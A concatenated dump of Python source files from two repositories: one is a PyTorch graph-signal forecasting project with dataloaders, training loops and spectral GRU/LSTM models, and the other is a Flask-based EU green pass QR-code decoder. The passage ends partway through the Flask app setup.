if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Semi-Supervised Prediction\n SeattleLoop dataset \n download link: https://github.com/zhiyongc/Seattle-Loop-Data ')
parser.add_argument('--epochs', type=int, default = 100, help='maximum number of epochs before stopping training')
parser.add_argument('--lr', type=float, default = 1e-4, help='starting learn rate' )
parser.add_argument('--patience', type=int, default = 10, help='number of consecutive non-improving validation loss epochs before stop training')
parser.add_argument('--sample-perc', type=int, default = 50, help='percentage of in-sample nodes')
parser.add_argument('--F-perc', type=int, default = None, help='percentage of frequencies to keep in frequency set \mathcal{F}')
parser.add_argument('--S-perc', type=int, default = 50, help='percentage of samples')
parser.add_argument('--e-opt', action='store_true',help='if sampling is performed by E-optmal greedy algorithm')
parser.add_argument('--sample-seed',type=int,default=1, help='number of run with uniformely random samples. Only used if --e-opt is False')
parser.add_argument('--seq-len', type=int,default=10, help='history length')
parser.add_argument('--pred-len', type=int,default=1, help='prediction horizon')
parser.add_argument('--save-name', type=str, default='sggru_S50_F53_opt_pred1', help='name of file')
parser.add_argument('--supervised', action='store_true', help='if training is supervised or semi-supervised. Deafault is semi-supervised')
parser.add_argument('--device', type=str, default='cuda', help='devices: cuda or cpu')
args = parser.parse_args()
training_routine(args)
| Python | 135 | 40.148148 | 165 | /main/seattle_train_sggru_semisupervised.py | 0.645068 | 0.633009 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master |
import time
import numpy as np
import pandas as pd
import torch
import torch.utils.data as utils
from pytorch_gsp.utils.gsp import complement
def PrepareSequence(data, seq_len = 10, pred_len = 1):
    """Slice a time series into (history window, target) pairs.

    The target for window starting at t is the single step at
    t + seq_len + pred_len - 1.
    """
    n_steps = data.shape[0]
    n_windows = n_steps - seq_len - pred_len
    windows = [data[start:start + seq_len] for start in range(n_windows)]
    targets = [data[start + seq_len + pred_len - 1:start + seq_len + pred_len]
               for start in range(n_windows)]
    return np.asarray(windows), np.asarray(targets)
def SplitData(data, label = None, seq_len = 10, pred_len = 1, train_proportion = 0.7,
              valid_proportion = 0.2, shuffle = False):
    """Normalise a time series by its maximum and split it chronologically.

    Validation and test segments are prefixed with `seq_len` steps of the
    preceding segment so sliding windows can start at their first step.

    Args:
        data: (time, nodes) array.
        label: optional label array aligned with `data`.
        seq_len: history window length.
        pred_len: prediction horizon.
        train_proportion / valid_proportion: chronological split fractions.
        shuffle: unused; kept for interface compatibility.

    Returns:
        (train, valid, test, max_value), each split normalised by max_value;
        when `label` is given, the three splits are (data, label) pairs.
    """
    max_value = np.max(data)
    # bug fix: the input was normalised in place (`data /= max_value`),
    # silently mutating the caller's array; divide into a fresh array.
    data = data / max_value
    samp_size = data.shape[0]
    if label is not None:
        assert label.shape[0] == samp_size
    train_index = int(np.floor(samp_size * train_proportion))
    valid_index = int(np.floor(samp_size * (train_proportion + valid_proportion)))
    if label is not None:
        train_data = data[:train_index + pred_len - 1]
        train_label = label[:train_index + pred_len - 1]
        valid_data = data[train_index - seq_len:valid_index + pred_len - 1]
        valid_label = label[train_index - seq_len:valid_index + pred_len - 1]
        test_data, test_label = data[valid_index - seq_len:], label[valid_index - seq_len:]
        return (train_data, train_label), (valid_data, valid_label), (test_data, test_label), max_value
    train_data = data[:train_index + pred_len - 1]
    valid_data = data[train_index - seq_len:valid_index + pred_len - 1]
    test_data = data[valid_index - seq_len:]
    return train_data, valid_data, test_data, max_value
def Dataloader(data, label, batch_size = 40, suffle = False):
    """Wrap (data, label) arrays into a batched DataLoader.

    The last partial batch is dropped (drop_last=True).
    """
    dataset = utils.TensorDataset(torch.Tensor(data), torch.Tensor(label))
    return utils.DataLoader(dataset, batch_size=batch_size, shuffle=suffle, drop_last=True)
def Preprocessing_hop_interp(matrix, A ,sample):
    """One-hop interpolation baseline for unobserved nodes.

    Unobserved columns are first filled with the mean of the first 100
    in-sample observations, then replaced by the mean of their graph
    neighbours' values.

    Args:
        matrix (pandas DataFrame): signals (time x nodes).
        A (2D numpy array): adjacency matrix.
        sample (list-like): indices of observed nodes.

    Returns:
        2D numpy array: signals with unobserved columns interpolated.
    """
    unknown = complement(sample, matrix.shape[1])
    filled = np.copy(matrix.values)
    filled[:, unknown] = np.mean(matrix.values[:100, sample])
    for node in unknown:
        neighbors = np.nonzero(A[node])[0]
        # Each row's update reads only that same row, so the original
        # per-time-step loop collapses into one vectorised column mean.
        filled[:, node] = np.mean(filled[:, neighbors], axis=1)
    return filled
def MaxScaler(data):
    """Scale `data` by its global maximum; return (max_value, scaled)."""
    peak = np.max(data)
    return peak, data / peak
def Preprocessing_GFT(matrix, sample, V, freqs):
    """Project sampled graph signals onto the retained Fourier modes.

    The sampled signal is zero-filled on out-of-sample nodes before the
    projection, i.e. Tx = (V_f^T Psi x)^T.
    """
    signals = matrix.T
    Vf = V[:, freqs]
    lifted = np.zeros((V.shape[0], signals.shape[1]))
    lifted[sample] = signals  # zero-fill the out-of-sample rows
    return (Vf.T @ lifted).T
class DataPipeline:
    def __init__(self, sample, V , freqs ,seq_len, pred_len, gft = True):
        """
        DataPipeline: perform the sampling procedure on the graph signals and create the dataloader object
        Args:
            sample (np array): list of graph indices
            V (2D np array): Laplacian eigenvector matrix
            freqs (np array): list of frequency indices
            seq_len (int): size of historical data
            pred_len (int): number of future samples
            gft (bool, optional): if the graph Fourier transform should be applied. Defaults to True.
        """
        self.sample = sample
        self.V = V
        self.freqs = freqs
        self.seq_len = seq_len
        self.pred_len = pred_len
        self.gft = gft
    def fit(self,train_data,sample_label = True, batch_size=40, shuffle=True):
        """
        fit: build dataloader for training data
        Args:
            train_data (numpy array): train data
            sample_label (bool, optional): If labels should be restricted to the sampled
            nodes for semisupervised learning. Defaults to True.
            batch_size (int, optional): batch size. Defaults to 40.
            shuffle (bool, optional): If samples should be shuffled. Defaults to True.
        Returns:
            pytorch Dataloader: train data prepared for training
        """
        # Sliding windows over the full signal (relies on module-level
        # PrepareSequence).
        train_X, train_y = PrepareSequence(train_data, seq_len = self.seq_len, pred_len = self.pred_len)
        if self.gft:
            # Append the GFT coefficients of the sampled nodes as extra features.
            train_data_freqs = Preprocessing_GFT(train_data[:,self.sample],self.sample, self.V , self.freqs )
            train_X_freqs, _ = PrepareSequence(train_data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
            train_X = np.concatenate((train_X[:,:,self.sample], train_X_freqs), axis=-1)
        if sample_label:
            # Restrict targets to the sampled nodes (double transpose selects columns).
            train_y = train_y.T[self.sample]
            train_y = train_y.T
        return Dataloader(train_X, train_y, batch_size, shuffle)
    def transform(self, data, sample_label = True, batch_size=40,shuffle=True):
        """
        transform: build dataloader for validation and test data
        Args:
            data (numpy array): validation or test data
            sample_label (bool, optional): If labels should be restricted to the sampled
            nodes for semisupervised learning. Defaults to True.
            batch_size (int, optional): batch size. Defaults to 40.
            shuffle (bool, optional): If samples should be shuffled. Defaults to True.
        Returns:
            pytorch Dataloader: data prepared for evaluation
        """
        X, y = PrepareSequence(data, seq_len = self.seq_len, pred_len = self.pred_len)
        if self.gft:
            data_freqs = Preprocessing_GFT(data[:,self.sample],self.sample, self.V , self.freqs)
            X_freqs, _ = PrepareSequence(data_freqs, seq_len = self.seq_len, pred_len = self.pred_len)
            X = np.concatenate((X[:,:,self.sample], X_freqs), axis=-1)
        if sample_label:
            y = y.T[self.sample]
            y = y.T
        return Dataloader(X, y, batch_size, shuffle)
| Python | 154 | 38.006493 | 137 | /data/Dataloader.py | 0.607593 | 0.600298 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import os
import sys
# Repository root = parent of the directory containing this file.
current_dir = os.path.split(os.path.dirname(os.path.realpath(__file__)))[0]
# Make the sibling 'data' package importable from scripts run in 'main'.
sys.path.append(os.path.join(current_dir, 'data'))
print(sys.path)
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | from setuptools import setup, find_packages
# Package metadata for pip installation.
setup(
    name='Joint-Forecasting-and-Interpolation-of-Graph-Signals-Using-Deep-Learning',
    version='0.1.0',
    author='Gabriela Lewenfus',
    author_email='gabriela.lewenfus@gmail.com',
    packages=find_packages(),
    # NOTE(review): 'numpy>=0.46' looks like a typo (numpy releases are 1.x),
    # and torch is imported throughout but not pinned here — confirm intent.
    install_requires = ['scipy>=1.4.1', 'pandas>=0.15', 'scikit-learn>=0.22', 'numpy>=0.46'],
    description='Code from the paper Joint Forecasting and Interpolation of Graph Signals Using Deep Learning',
)
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | ### training code ####
import sys
import time
import numpy as np
import torch
from torch.autograd import Variable
toolbar_width=20
def Train(model, train_dataloader, valid_dataloader, learning_rate = 1e-5, epochs = 300, patience = 10,
          verbose=1, gpu = True, sample = None, optimizer = 'rmsprop'):
    """Train ``model`` with early stopping on the validation loss.

    Args:
        model: module exposing ``loss(outputs, y)`` and ``schedule(optimizer)``.
        train_dataloader / valid_dataloader: PyTorch dataloaders of (inputs, labels).
        learning_rate (float, optional): initial learning rate. Defaults to 1e-5.
        epochs (int, optional): maximum number of epochs. Defaults to 300.
        patience (int, optional): epochs without improvement before stopping. Defaults to 10.
        verbose (int, optional): if truthy, print a progress bar and per-epoch stats.
        gpu (bool, optional): if True, tensors are moved to CUDA.
        sample: accepted for API compatibility; currently unused.
        optimizer (str, optional): 'rmsprop' or 'adam'. Defaults to 'rmsprop'.

    Returns:
        (best_model, [train losses, valid losses, epoch times, valid times]),
        or (None, None) if training diverged.

    NOTE(review): ``best_model = model`` stores a reference, not a copy, so
    the returned weights are the last ones, not the best-epoch snapshot.
    NOTE(review): the validation loop runs without ``torch.no_grad()``,
    wasting memory on autograd bookkeeping.
    """
    if optimizer == 'rmsprop':
        optimizer = torch.optim.RMSprop(model.parameters(), lr = learning_rate)
    elif optimizer == 'adam':
        optimizer = torch.optim.Adam(model.parameters(), lr = learning_rate )
    loss_MSE = torch.nn.MSELoss()  # NOTE(review): unused; model.loss is used instead
    loss_L1 = torch.nn.L1Loss()    # NOTE(review): unused
    batch_size = train_dataloader.batch_size
    if gpu: device='cuda'
    else: device= 'cpu'
    losses_epochs_train = []
    losses_epochs_valid = []
    time_epochs = []
    time_epochs_val = []
    is_best_model = 0
    patient_epoch = 0
    scheduler = model.schedule(optimizer)
    for epoch in range(epochs):
        pre_time = time.time()
        # Probe dataset size: custom datasets expose .data_size, while
        # TensorDataset exposes .tensors. Both probes are best-effort.
        try:
            data_size=train_dataloader.dataset.data_size
        except: pass
        try:
            data_size=train_dataloader.dataset.tensors[0].shape[0]
        except: pass
        n_iter=data_size/train_dataloader.batch_size
        if verbose:
            # Fixed-width text progress bar advanced at evenly spaced checkpoints.
            count=0
            checkpoints=np.linspace(0,n_iter,toolbar_width).astype(np.int16)
            text='Epoch {:02d}: '.format(epoch)
            sys.stdout.write(text+"[%s]" % (" " * toolbar_width))
            sys.stdout.flush()
            sys.stdout.write("\b" * (toolbar_width+1))
        losses_train = []
        losses_valid = []  # NOTE(review): dead init; re-initialized before validation below
        for data in train_dataloader:
            inputs, labels = data
            if inputs.shape[0] != batch_size:
                continue  # skip ragged final batch
            model.zero_grad()
            outputs = model(inputs.to(device))
            outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
            loss_train = model.loss(outputs,y)
            losses_train.append(loss_train.cpu().data.numpy())
            optimizer.zero_grad()
            loss_train.backward()
            optimizer.step()
            if verbose:
                if count in checkpoints:
                    sys.stdout.write('=')
                    sys.stdout.flush()
                count+=1
        # Read back the current learning rate (last param group wins) and
        # only step the scheduler while it is above the floor of 1e-5.
        for param_group in optimizer.param_groups:
            learning_rate = param_group['lr']
        if learning_rate >1e-5:
            scheduler.step()
        time_epochs.append(time.time()-pre_time)
        pre_time = time.time()
        # Validation pass.
        losses_valid = []
        for data in valid_dataloader:
            inputs, labels = data
            if inputs.shape[0] != batch_size:
                continue
            outputs= model(inputs.to(device))
            outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
            losses_valid.append(model.loss(outputs, y).cpu().data.numpy())
        time_epochs_val.append(time.time()-pre_time)
        losses_epochs_train.append(np.mean(losses_train))
        losses_epochs_valid.append(np.mean(losses_valid))
        avg_losses_epoch_train = losses_epochs_train[-1]
        avg_losses_epoch_valid = losses_epochs_valid[-1]
        # Abort on divergence rather than training to the epoch limit.
        if avg_losses_epoch_valid >100000000000:
            print("Diverged")
            return (None,None)
        # Early-stopping bookkeeping: track the best validation loss and the
        # number of consecutive epochs without a > 1e-6 improvement.
        if epoch == 0:
            is_best_model = True
            best_model = model
            min_loss = avg_losses_epoch_valid
        else:
            if min_loss - avg_losses_epoch_valid > 1e-6:
                is_best_model = True
                best_model = model
                min_loss = avg_losses_epoch_valid
                patient_epoch = 0
            else:
                is_best_model = False
                patient_epoch += 1
                if patient_epoch >= patience:
                    print('Early Stopped at Epoch:', epoch)
                    break
        if verbose:
            sys.stdout.write("]")
            print(' train loss: {}, valid loss: {}, time: {}, lr: {}'.format( \
                np.around(avg_losses_epoch_train, 6),\
                np.around(avg_losses_epoch_valid, 6),\
                np.around([time_epochs[-1] ] , 2),\
                learning_rate) )
    return best_model, [losses_epochs_train ,
                        losses_epochs_valid ,
                        time_epochs ,
                        time_epochs_val ]
def Evaluate(model, dataloader, scale=1, pred_len = 1, gpu = True):
    """Evaluate ``model`` on ``dataloader``; print and return MAE/RMSE/MAPE.

    Args:
        model: trained module mapping inputs to predictions.
        dataloader: PyTorch dataloader of (inputs, labels).
        scale (float, optional): factor undoing input normalization. Defaults to 1.
        pred_len (int, optional): kept for API compatibility; unused here.
        gpu (bool, optional): request CUDA; honored only when available.

    Returns:
        [per-batch L1 losses, per-batch MSE losses, mean MAE, mean MAPE,
        elapsed seconds].
    """
    batch_size = dataloader.batch_size
    pre_time = time.time()
    # BUGFIX: the caller's gpu flag was unconditionally overwritten by
    # torch.cuda.is_available(); now it is honored but CUDA is never
    # requested when unavailable.
    gpu = gpu and torch.cuda.is_available()
    device = 'cuda' if gpu else 'cpu'
    losses_mse = []
    losses_l1 = []
    losses_mape = []
    mse_fn = torch.nn.MSELoss()
    l1_fn = torch.nn.L1Loss()
    with torch.no_grad():  # inference only: skip autograd bookkeeping
        for data in dataloader:
            inputs, labels = data
            if inputs.shape[0] != batch_size:
                continue  # skip ragged final batch
            outputs = model(inputs.to(device))
            outputs, y = torch.squeeze(outputs), torch.squeeze(labels).to(device)
            losses_mse.append(mse_fn(outputs*scale, y*scale).cpu().data)
            losses_l1.append(l1_fn(outputs*scale, y*scale).cpu().data)
            out_np = outputs.cpu().data.numpy()*scale
            y_np = y.cpu().data.numpy()*scale
            abs_diff = np.abs(out_np - y_np)
            abs_y = np.abs(y_np)
            # MAPE restricted to targets with |y| > 1 to avoid division blow-up.
            mask = abs_y > 1
            if np.any(mask):
                loss_mape = np.mean(abs_diff[mask]/abs_y[mask])*100
            else:
                loss_mape = np.nan  # same value np.mean([]) produced, minus the warning
            losses_mape.append(loss_mape)
    losses_l1 = np.array(losses_l1)
    losses_mse = np.array(losses_mse)
    mean_l1 = np.mean(losses_l1, axis = 0)
    rmse = np.mean(np.sqrt(losses_mse))
    print('Test: MAE: {}, RMSE : {}, MAPE : {}'.format(mean_l1, rmse,np.mean(losses_mape)))
    return [losses_l1, losses_mse, mean_l1, np.mean(losses_mape), time.time()-pre_time]
### modified from https://github.com/zhiyongc/Graph_Convolutional_LSTM/blob/master/Code_V2/HGC_LSTM%20%26%20Experiments.ipynb | Python | 194 | 30.597939 | 125 | /pytorch_gsp/train/train_rnn.py | 0.539077 | 0.526187 |
gabilew/Joint-Forecasting-and-Interpolation-of-GS | refs/heads/master | import torch.utils.data as utils
import torch.nn.functional as F
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.nn.parameter import Parameter
import numpy as np
import pandas as pd
import time
from pytorch_gsp.utils.gsp import (spectral_components, Reconstruction)
class SpectralGraphForecast(nn.Module):
    """
    SpectralGraphForecast: parallel predictors in the spectral and vertex
    domains whose outputs are fused by a learned linear layer.
    Args:
        V (numpy array): eigenvector matrix of the graph signal processing model (i.e.: Laplacian eigenvectors)
        sample (numpy array): indices of in-sample nodes
        freqs (numpy array): frequency components to be used in interpolation
        rnn (str, optional): predictive model: lstm, gru, 1dconv. Defaults to 'gru'.
    """
    def __init__(self, V, sample,freqs, rnn = 'gru'):
        super(SpectralGraphForecast, self).__init__()
        self.N = V.shape[0] # number of nodes in the entire graph
        self.d = len(freqs) # number of frequencies
        self.n = len(sample) # number of samples
        self.sample = sample
        if rnn == 'gru':
            self.srnn = nn.GRU(self.d,self.d,1, batch_first=True)
            self.rnn = nn.GRU(self.n,self.n,1, batch_first=True)
        elif rnn == 'lstm':
            self.srnn = nn.LSTM(self.d,self.d,1, batch_first=True)
            self.rnn = nn.LSTM(self.n,self.n,1, batch_first=True)
        elif rnn == '1dconv':
            # BUGFIX: nn.Conv1d has no ``batch_first`` argument; passing it
            # raised a TypeError, so this branch could never be constructed.
            # NOTE(review): forward() indexes the module output as
            # [0][:, -1, :], which matches RNN outputs but not Conv1d's —
            # the conv path likely needs dedicated forward handling; confirm.
            self.srnn = nn.Conv1d(self.d,self.d,1)
            self.rnn = nn.Conv1d(self.n,self.n,1)
        if self.n != self.N:
            # Interpolation back to the full graph is only needed when the
            # sample does not already cover every node.
            self.interpolate = Reconstruction(V,sample,freqs, domain='spectral')
            self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
        self.linear = nn.Linear(self.N*2,self.N)
    def forward(self, input):
        # input concatenates vertex-domain features (first n) and
        # spectral-domain features (remaining d) along the last axis.
        x = input[:,:,:self.n]
        x_hat = input[:,:,self.n:]
        bz, seq_len, _ = x.size()
        x_hat = self.srnn(x_hat)[0][:,-1,:]  # last step of the spectral RNN
        if self.n != self.N:
            xtilde = self.interpolate(x_hat).unsqueeze(1)
        else:
            xtilde = x_hat.unsqueeze(1)
        x = self.rnn(x)[0][:,-1,:]  # last step of the vertex RNN
        if self.n != self.N:
            x1 = self.interpolate2(x)
            x1[:,self.sample] = x  # keep observed nodes exact
        else:
            x1 = x
        x1 = x1.unsqueeze(1)
        # Fuse both domain predictions with a learned linear map.
        x1 = torch.cat((xtilde,x1),dim = 1).reshape((bz, self.N*2))
        return self.linear(x1)
class SpectralGraphForecast2(nn.Module):
    """
    SpectralGraphForecast2: combination of predictive models in both spectral and vertex domains,
    mixed per node by a learned weight instead of a linear fusion layer.
    Args:
        V (numpy array): eigenvector matrix of the graph signal processing model (i.e.: Laplacian eigenvectors)
        sample (numpy array): indices of in-sample nodes
        freqs (numpy array): frequency components to be used in interpolation
        rnn (str, optional): predictive model: lstm, gru. Defaults to 'gru'.
    """
    def __init__(self, V, sample,freqs, rnn = 'gru'):
        super(SpectralGraphForecast2, self).__init__()
        self.N = V.shape[0]  # nodes in the full graph
        self.d = len(freqs)  # number of frequency components
        self.n = len(sample)  # number of sampled nodes
        self.sample = sample
        if rnn == 'gru':
            self.srnn = nn.GRU(self.d,self.d,1, batch_first=True)
            self.rnn = nn.GRU(self.n,self.n,1, batch_first=True)
        elif rnn == 'lstm':
            self.srnn = nn.LSTM(self.d,self.d,1, batch_first=True)
            self.rnn = nn.LSTM(self.n,self.n,1, batch_first=True)
        if self.n != self.N:
            # BUGFIX: domain was misspelled 'sprctral'; the sibling class uses
            # 'spectral' for the same reconstruction.
            self.interpolate = Reconstruction(V,sample,freqs, domain='spectral')
            self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
        # Learned per-node mixing weight between the two domain predictions.
        self.w = Parameter(torch.Tensor(self.N), requires_grad=True)
        self.w.data.fill_(0.01)
    def forward(self, input):
        x = input[:,:,:self.n]      # vertex-domain features
        x_hat = input[:,:,self.n:]  # spectral-domain features
        bz, seq_len, _ = x.size()
        x_hat = self.srnn(x_hat)[0][:,-1,:]
        if self.n != self.N:
            xtilde = self.interpolate(x_hat)
        else:
            xtilde = x_hat
        x = self.rnn(x)[0][:,-1,:]
        if self.n != self.N:
            x1 = self.interpolate2(x)
        else:
            # BUGFIX: x1 was left undefined when the sample covers the whole
            # graph, raising NameError in the return expression below.
            x1 = x
        # Convex-like per-node combination controlled by tanh(w).
        return torch.tanh(self.w)*xtilde + (1-torch.tanh(self.w))*x1
class model(nn.Module):
    def __init__(self, V, sample,freqs, layer, supervised = True, l1=0,l2=0, schedule_step=10):
        """
        model: wrapper class to train a SpectralGraphForecast layer
        Args:
            V (numpy array): eigenvector matrix from the graph signal processing model (i.e.: Laplacian eigenvectors)
            sample (numpy array): indices of in-sample nodes
            freqs (numpy array): frequency components to be used in interpolation
            layer (nn.Module): SpectralGraphForecast layer
            supervised (bool, optional): if False, targets are interpolated to the full graph before the loss. Defaults to True.
            l1 (float, optional): L1 regularization weight on sampled nodes. Defaults to 0.
            l2 (float, optional): L2 regularization weight on sampled nodes. Defaults to 0.
            schedule_step (int, optional): epochs between learning-rate halvings. Defaults to 10.
        """
        super(model, self).__init__()
        self.N = V.shape[0]
        self.d = len(freqs)
        self.n = len(sample)
        self.supervised = supervised
        self.sample = sample
        self.layer = layer
        self.l1 = l1
        self.l2 = l2
        self.schedule_step = schedule_step
        if not supervised:
            self.interpolate = Reconstruction(V,sample,freqs, domain='vertex')
    def forward(self, input):
        return self.layer(input)
    def loss(self,out,y):
        """MSE loss plus optional L1/L2 regularization on the sampled nodes."""
        assert (self.l1+self.l2 <=1)
        assert(self.l1>=0)
        assert(self.l2>=0)
        regularization_loss = 0
        if self.l1 != 0:
            regularization_loss += self.l1*torch.nn.L1Loss()(y[:,self.sample],out[:,self.sample])
        if self.l2 != 0:
            regularization_loss += self.l2*torch.norm(y[:,self.sample]-out[:,self.sample])
        if not self.supervised:
            # Semisupervised target: interpolate labels to the full graph,
            # keeping the observed nodes exact.
            ys = y
            y = self.interpolate(ys)
            y[:,self.sample] = ys
        return torch.nn.MSELoss()(y,out) + regularization_loss
    def schedule(self,opt):
        """Halve the learning rate every ``schedule_step`` epochs above 1e-5.

        BUGFIX: the interval was hard-coded to 10, silently ignoring the
        ``schedule_step`` constructor argument (the sibling model2 honors it).
        """
        for param_group in opt.param_groups:
            learning_rate = param_group['lr']
            if learning_rate > 1e-5:
                lamb = lambda epoch: 0.5 if epoch%self.schedule_step == 0 else 1
            else:
                lamb = lambda epoch: 1  # at the floor: keep the LR constant
        return torch.optim.lr_scheduler.MultiplicativeLR(opt, lr_lambda=[lamb])
class model2(nn.Module):
    def __init__(self, V, sample,freqs, layer,l1=0,l2=0,schedule_step=10, supervised = True, unsqueeze=False):
        """
        model2: runs ``layer`` on the (sampled) input and interpolates the
        prediction back to the full graph.
        Args:
            V (numpy array): eigenvector matrix from the graph signal processing model (i.e.: Laplacian eigenvectors)
            sample (numpy array): indices of in-sample nodes
            freqs (numpy array): frequency components to be used in interpolation
            layer (nn.Module): predictive layer
            l1 (float, optional): L1 regularization weight on sampled nodes. Defaults to 0.
            l2 (float, optional): L2 regularization weight on sampled nodes. Defaults to 0.
            schedule_step (int, optional): epochs between learning-rate halvings. Defaults to 10.
            supervised (bool, optional): if False, targets are interpolated before the loss. Defaults to True.
            unsqueeze (bool, optional): if True, add a channel dimension before the layer. Defaults to False.
        """
        super(model2, self).__init__()
        self.N = V.shape[0]
        self.d = len(freqs)
        self.n = len(sample)
        self.supervised = supervised
        self.sample = sample
        self.unsqueeze = unsqueeze
        self.layer = layer
        self.l1 = l1
        self.l2 = l2
        self.schedule_step = schedule_step
        self.interpolate2 = Reconstruction(V,sample,freqs, domain='vertex')
        if not supervised:
            self.interpolate = Reconstruction(V,sample,freqs, domain='vertex')
        self.linear = torch.nn.Linear(self.N,self.N)
    def forward(self, input):
        bz, seq_len, N = input.size()
        x = input
        if self.unsqueeze:
            # BUGFIX: the unsqueezed tensor was previously discarded (the
            # layer always received the raw input), making the ``unsqueeze``
            # option a silent no-op.
            x = x.unsqueeze(dim=1)
        x = self.layer(x)
        if N < self.N:
            x1 = self.interpolate2(x)
            x1[:,self.sample] = x  # keep observed nodes exact
        else:
            x1 = x
        return x1
    def loss(self,out,y):
        """MSE loss plus optional L1/L2 regularization on the sampled nodes."""
        # NOTE(review): the sibling ``model`` class allows l1+l2 == 1 (<=);
        # confirm whether the strict inequality here is intentional.
        assert (self.l1+self.l2 <1)
        assert(self.l1>=0)
        assert(self.l2>=0)
        regularization_loss = 0
        if self.l1 != 0:
            regularization_loss += self.l1*torch.nn.L1Loss()(y[:,self.sample],out[:,self.sample])
        if self.l2 != 0:
            regularization_loss += self.l2*torch.norm(y[:,self.sample]-out[:,self.sample])
        if not self.supervised:
            # Semisupervised target: interpolate labels to the full graph,
            # keeping the observed nodes exact.
            ys = y
            y = self.interpolate(ys)
            y[:,self.sample] = ys
        return torch.nn.MSELoss()(y,out) + regularization_loss
    def schedule(self,opt):
        """Halve the learning rate every ``schedule_step`` epochs above 1e-5."""
        for param_group in opt.param_groups:
            learning_rate = param_group['lr']
            if learning_rate > 1e-5:
                lamb = lambda epoch: 1/2 if epoch%self.schedule_step == 0 else 1
            else:
                lamb = lambda epoch: 1  # at the floor: keep the LR constant
        return torch.optim.lr_scheduler.MultiplicativeLR(opt, lr_lambda=[lamb])
| Python | 242 | 34.884296 | 117 | /pytorch_gsp/models/sggru.py | 0.568747 | 0.553086 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | from pyzbar.pyzbar import decode
from PIL import Image
from base45 import b45decode
from zlib import decompress
from flynn import decoder as flynn_decoder
from lib.datamapper import DataMapper as data_mapper
class GreenPassDecoder(object):
    """Decode an EU Digital COVID Certificate from a QR-code image stream."""

    stream_data = None

    def __init__(self, stream_data):
        # Read the first QR code found in the image and keep its raw payload.
        self.stream_data = decode(Image.open(stream_data))[0].data

    def decode(self, schema):
        """Decode the certificate payload and map it against ``schema``."""
        # Payload layout: 4-byte 'HC1:' prefix, then base45 -> zlib -> CBOR (COSE).
        payload = self.stream_data[4:]
        cose_bytes = decompress(b45decode(payload))
        (_, (header_1, header_2, cbor_payload, sign)) = flynn_decoder.loads(cose_bytes)
        claims = flynn_decoder.loads(cbor_payload)
        mapper = data_mapper(claims, schema)
        return mapper.convert_json()
| Python | 21 | 32.761906 | 88 | /lib/greenpass.py | 0.693935 | 0.679831 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | import json
from urllib.request import urlopen
class DataMapperError(Exception):
    """Raised when DataMapper is given invalid QR data or schema."""
    pass
class DataMapper:
    """Map decoded certificate claims onto HTML using a remote JSON schema."""
    # NOTE(review): class-level attributes act as shared defaults; instances
    # overwrite them in __init__. ``new_json`` appears to be unused.
    qr_data = None
    schema = None
    json = ''
    new_json = {}
    def _save_json(self, data, schema, level=0):
        # Recursively walk the claim dict, appending one <p> per field,
        # indented by nesting level; dicts/lists recurse through the schema's
        # $ref definitions.
        for key, value in data.items():
            try:
                # Prefer the schema's title, then description, then the raw
                # key; keep only the part before ' - '.
                description = schema[key].get('title') or schema[key].get('description') or key
                description, _, _ = description.partition(' - ')
                if type(value) is dict:
                    self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
                    _, _, sch_ref = schema[key]['$ref'].rpartition('/')
                    self._save_json(value, self.schema['$defs'][sch_ref]['properties'], level + 1)
                elif type(value) is list:
                    self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong></p>'
                    _, _, sch_ref = schema[key]['items']['$ref'].rpartition('/')
                    for v in value:
                        self._save_json(v, self.schema['$defs'][sch_ref]['properties'], level + 1)
                else:
                    self.json += '<p>' + (' ' * level) + '<strong>' + description + '</strong>' + ':' + str(
                        value) + '</p>'
            except KeyError:
                # NOTE(review): fields missing from the schema are skipped
                # with a console print only — consider logging instead.
                print('error keys')
                print(data)
    def __set_schema(self, schema_url):
        # Fetch and parse the JSON schema from the given URL.
        sch = urlopen(schema_url)
        self.schema = json.load(sch)
    def __init__(self, qr_data, schema_url, params_string=False):
        # Claim keys used by the CBOR payload: -260 holds the health
        # certificate container and 1 the payload itself. Some decoders
        # produce string keys, hence params_string — confirm with callers.
        i = -260
        j = 1
        if params_string:
            i = str(i)
            j = str(j)
        self.json = ''
        self.qr_data = qr_data[i][j]
        self.__set_schema(schema_url)
    def convert_json(self):
        """Render the stored claims as HTML; raise DataMapperError if unset."""
        if self.qr_data is None:
            raise DataMapperError("QR_DATA_IS_WRONG")
        if self.schema is None:
            raise DataMapperError("SCHEMA_IS_WRONG")
        self._save_json(self.qr_data, self.schema['properties'])
        return self.json
| Python | 61 | 34.229507 | 117 | /lib/datamapper.py | 0.470451 | 0.467194 |
sciaso/greenpass-covid19-qrcode-decoder | refs/heads/master | from flask import Flask, redirect, request, render_template
from os.path import splitext
from flask_sslify import SSLify
from flask_babel import Babel, gettext
import os
from lib.greenpass import GreenPassDecoder as greenpass_decoder
# Deployment configuration comes from environment variables.
is_prod = os.environ.get('PRODUCTION', None)
ga_id = os.environ.get('GA_ID', None)  # Google Analytics tracking id
sharethis_script_src = os.environ.get('SHARETHIS_SCRIPT_SRC', None)
app_url = os.environ.get('APP_URL', None)
app = Flask(__name__)
app.config['BABEL_DEFAULT_LOCALE'] = 'en'
# Reject uploads larger than 4 MiB.
app.config['MAX_CONTENT_LENGTH'] = 4096 * 1024
app.config['UPLOAD_EXTENSIONS'] = ['.jpg', '.png', '.jpeg']
app.config['GITHUB_PROJECT'] = 'https://github.com/debba/greenpass-covid19-qrcode-decoder'
# JSON schema used to map the decoded certificate payload to labels.
app.config[
    'DCC_SCHEMA'] = 'https://raw.githubusercontent.com/ehn-dcc-development/ehn-dcc-schema/release/1.3.0/DCC.combined-schema.json'
app.glb_schema = {}
app.converted_schema = ''
app.config['LANGUAGES'] = {
    'en': 'English',
    'it': 'Italiano'
}
babel = Babel(app)
@babel.localeselector
